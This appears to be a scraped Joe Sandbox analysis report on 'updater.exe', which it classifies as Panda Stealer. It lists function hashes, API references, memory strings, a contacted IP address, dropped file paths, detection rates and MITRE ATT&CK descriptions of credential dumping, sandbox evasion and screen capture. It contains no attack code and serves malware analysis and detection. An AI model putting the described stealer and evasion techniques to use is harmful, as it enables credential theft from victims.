Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: d1f6a7d90d5111c47c92f9730ff92609a85398bde65663dfd125c4a137dc6611
Instruction ID: 86b66f1a92fbd549a5f4daa26d99ee7a888a6c37967d61866268a74895e9aec5
Opcode Fuzzy Hash: d1f6a7d90d5111c47c92f9730ff92609a85398bde65663dfd125c4a137dc6611
Instruction Fuzzy Hash: E1418D72900209AFDF16DFA8CD80AEEBBB5FF48704F18816AFE0467269D3359950DB54

Uniqueness

Uniqueness Score: -1.00%

Function 01408B06 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 01408B0D
__cftoe.LIBCMT ref: 01408B89

Strings

!%x, xrefs: 01408B1E

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: H_prolog3___cftoe
String ID: !%x
API String ID: 855520168-1893981228
Opcode ID: cb90704033225a7312ff8d9949948b59ea563cd9b80c7bc4ee01f55d7fda37bd
Instruction ID: 6f5cf865db72b70f4bd2dc64a3652b0004d15ca39364182b7c353aa091d68b0b
Opcode Fuzzy Hash: cb90704033225a7312ff8d9949948b59ea563cd9b80c7bc4ee01f55d7fda37bd
Instruction Fuzzy Hash: 49312AB1D0120EAFCF05EF99E980AEEB7B5FF18314F10442AF504A72A1D735AA55CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0140259B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 013FB5E6: _Maklocstr.LIBCPMT ref: 013FB606
Part of subcall function 013FB5E6: _Maklocstr.LIBCPMT ref: 013FB623
Part of subcall function 013FB5E6: _Maklocstr.LIBCPMT ref: 013FB640
Part of subcall function 013FB5E6: _Maklocchr.LIBCPMT ref: 013FB652
Part of subcall function 013FB5E6: _Maklocchr.LIBCPMT ref: 013FB665

_Mpunct.LIBCPMT ref: 0140262F
_Mpunct.LIBCPMT ref: 01402649

Strings

$+xv, xrefs: 01402654

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: Maklocstr$MaklocchrMpunct
String ID: $+xv
API String ID: 542472742-1686923651
Opcode ID: 6d4780d07cfce3a313bb0c3cce5da8bddaecd6089f75bf559dbeb58f768be68c
Instruction ID: 2749ac9d1cbe2d442d0edf9fc5a7dc0f99c45b9fea4b282538dd8dc0964e7232
Opcode Fuzzy Hash: 6d4780d07cfce3a313bb0c3cce5da8bddaecd6089f75bf559dbeb58f768be68c
Instruction Fuzzy Hash: F121B5B1504A526ED726DF76C884B3BBEE8AB18200F04091FE159C7A90D774E601CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0140AB5E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

_Mpunct.LIBCPMT ref: 0140ABF2
_Mpunct.LIBCPMT ref: 0140AC0C

Strings

$+xv, xrefs: 0140AC17

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: Mpunct
String ID: $+xv
API String ID: 4240859931-1686923651
Opcode ID: e93eb0c8747d0e5a48521fe47b1fb419fc64b1e80a7f8b71d1d0e598ff45dc3a
Instruction ID: e3dc3dd633383e81dab12a4b8e9a00ab301cbae4b5e7e324914241303c8e4bcc
Opcode Fuzzy Hash: e93eb0c8747d0e5a48521fe47b1fb419fc64b1e80a7f8b71d1d0e598ff45dc3a
Instruction Fuzzy Hash: D821B2B1904B526ED722DF76889073BBFF8AB1C200F140A6FE599C7A90D734E641CB90

Uniqueness

Uniqueness Score: -1.00%

Function 013F8AA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 013F8AA7

Strings

true, xrefs: 013F8B11
false, xrefs: 013F8AFE

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: H_prolog3_
String ID: false$true
API String ID: 2427045233-2658103896
Opcode ID: eafcef69088d0f91073879bacb7e2a6d03b40b899580ef70039f3eb266d0c052
Instruction ID: 919750870ec6483b6a1d9b1ad0aef85dd1ff901371a245958a434ba3c4ad1cde
Opcode Fuzzy Hash: eafcef69088d0f91073879bacb7e2a6d03b40b899580ef70039f3eb266d0c052
Instruction Fuzzy Hash: A011D3B19407459EC725EFB9D401B8AB7F4AF29200F14855FE2A5D7690DB70E5049B50

Uniqueness

Uniqueness Score: -1.00%

Function 013DC2D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 013DC316

Strings

%lld, xrefs: 013DC2F2
%!.15g, xrefs: 013DC305

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: _strlen
String ID: %!.15g$%lld
API String ID: 4218353326-2983862324
Opcode ID: a0b56c9d5476707d7db0d7cfa5fba181d3f432fa0f62c172376cf485fcdf5909
Instruction ID: 65e71123b29d70fe108088bd228ebba39cc31c13253c6e7fac5d4e756f57aec5
Opcode Fuzzy Hash: a0b56c9d5476707d7db0d7cfa5fba181d3f432fa0f62c172376cf485fcdf5909
Instruction Fuzzy Hash: 2CF02872A14B056AE3305F9EAC01A13B7E8EF99B14F00071FF5CD92551EAB0A94587E5

Uniqueness

Uniqueness Score: -1.00%

Function 0140D941 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 013B4317: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,00000000,8007000E,?,?,?,014506B0,013CF491,?,013CE301,80070057,?,013CF491,00000001), ref: 013B431D
Part of subcall function 013B4317: GetLastError.KERNEL32(?,00000000,00000000,00000000,8007000E,?,?,?,014506B0,013CF491,?,013CE301,80070057,?,013CF491,00000001), ref: 013B4327

IsDebuggerPresent.KERNEL32(?,?,?,013B1130), ref: 0140D974
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,013B1130), ref: 0140D983

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0140D97E

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3511171328-631824599
Opcode ID: 715f8e16c6700d3f46eb1e652ed6f65850a285c58d5cb2a2495e12ee88bbb604
Instruction ID: 1a0fbdcd4b544d0307fbfbcef991e40afdf253a69fbdfa3a886affe524b90276
Opcode Fuzzy Hash: 715f8e16c6700d3f46eb1e652ed6f65850a285c58d5cb2a2495e12ee88bbb604
Instruction Fuzzy Hash: 10E06DB46007018BD7319FAAD544382BBE5AB04708F04892ED8A6C6764E7B0D448CB91

Uniqueness

Uniqueness Score: -1.00%

Source: Joe Sandbox View	IP Address: 141.8.192.151 141.8.192.151
Source: Joe Sandbox View	IP Address: 141.8.192.151 141.8.192.151

Source: updater.exe, 00000001.00000002.1124810776.0000000008E6B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: updater.exe, 00000001.00000002.1124428852.000000000018D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobe.c/s
Source: updater.exe, 00000001.00000002.1124403437.0000000000026000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobede
Source: updater.exe, 00000001.00000002.1124810776.0000000008E6B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0K
Source: TTFJYWWSOQ.CMMEDGCGG.1.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: TTFJYWWSOQ.CMMEDGCGG.1.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: TTFJYWWSOQ.CMMEDGCGG.1.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: TTFJYWWSOQ.CMMEDGCGG.1.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: TTFJYWWSOQ.CMMEDGCGG.1.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: TTFJYWWSOQ.CMMEDGCGG.1.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: TTFJYWWSOQ.CMMEDGCGG.1.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: updater.exe, 00000001.00000002.1124810776.0000000008E6B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: TTFJYWWSOQ.CMMEDGCGG.1.dr	String found in binary or memory: https://www.google.com/favicon.ico

Source: updater.exe	Virustotal: Detection: 84%			Perma Link
Source: updater.exe	ReversingLabs: Detection: 91%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	API monitoring, File monitoring, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques.
Tactics:	Collection
Data Sources:	API monitoring, Authentication logs, Packet capture, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report updater.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Panda Stealer

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\BOFUPMJWUSFVSNIBDJEE\LDIJOWLSBYSXXKSYCYK.OXKWSVVGDWWWWRYE

C:\Users\user\AppData\Local\Temp\BOFUPMJWUSFVSNIBDJEE\LIVVLE.BYWLLNHYGV

C:\Users\user\AppData\Local\Temp\BOFUPMJWUSFVSNIBDJEE\LODKMBCQWBJDLWJIJSMI.FEGI

C:\Users\user\AppData\Local\Temp\BOFUPMJWUSFVSNIBDJEE\QFJBXSKPEM.WQRIPFTOG

C:\Users\user\AppData\Local\Temp\BOFUPMJWUSFVSNIBDJEE\TTFJYWWSOQ.CMMEDGCGG

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Windows Analysis Report
updater.exe

Function 013B3507 Relevance: 49.4, APIs: 23, Strings: 5, Instructions: 360
libraryloaderCOMMON

Function 013BB653 Relevance: 25.9, Strings: 20, Instructions: 924
COMMON

Function 013C1BD6 Relevance: 24.5, Strings: 19, Instructions: 717
COMMON

Function 013C3095 Relevance: 22.1, Strings: 17, Instructions: 872
COMMON

Function 013CA518 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 238
libraryloaderCOMMON

Function 013F61B5 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 266
COMMON

Function 013CB7C3 Relevance: 15.2, APIs: 10, Instructions: 155
windowCOMMON

Function 013B7D35 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 400
COMMON

Function 013C2C33 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 221
libraryloaderCOMMON

Function 013F6531 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 123
fileCOMMON

Function 014244F6 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301
COMMONLIBRARYCODE

Function 0142C47C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273
COMMONLIBRARYCODE

Function 013BDDC0 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 297
fileCOMMON

Function 013BF68F Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 296
fileCOMMON

Function 013CC44A Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 295
networkCOMMON